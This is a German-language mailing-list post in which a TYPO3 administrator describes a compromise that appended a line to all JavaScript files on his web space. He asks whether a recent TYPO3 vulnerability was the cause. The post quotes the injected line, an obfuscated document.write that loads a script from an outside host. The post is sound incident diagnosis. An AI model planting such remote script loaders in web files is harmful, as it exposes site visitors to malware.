[TYPO3-german] Malware in Seite
Jan Kornblum
jan.kornblum at gmx.de
Thu Oct 21 09:26:21 CEST 2010
Hallo Gruppe,
ich hatte gestern eine TYPO3 Installation, in der sämmtlche Javascript
Dateien "infiziert" waren, in jeder Datei war am Ende eine Zeile
zusätzlicher Code angefügt worden... Im gleichen Webspace übrigens auch
bei einer ganz anderen Seite, ohne TYPO3.
Ich frage mich gerade, ob hier die letzte TYPO3 Sicherheitslücke
ausgenutzt wurde (das Update wurde nicht frühzeitig eingespielt), um
das zu bewerkstelligen:
http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-020/
Allerdings scheint darüber ja kein Schreibzugriff auf den Server
möglich gewesen zu sein... Oder doch über Umwege? Und dann stellt sich
die Frage, warum *sämltiche* JS-Dateien verändert waren, da muss ja
aktiv was auf dem Server gelaufen sein um sich zu verbreiten...
Was meint ihr? Typisches Szenario für augenutze Sicherheitslücke
(s.o.), oder andere Ursache? Und nach was könnte man in den Apache
Logfiles suchen um herauszufinden, ob das ganze über TYPO3 reinkam?
Für die, die es interessiert, folgender Code war in den Dateien
([irgendwas] ist hier Platzhalter):
document.write('<sc'+'ript type="text/javascript"
src="http://addle.diretctrishta.com:8080/[irgendwas].js"></scri'+'pt>');
Lieben Gruß, Jan
More information about the TYPO3-german
mailing list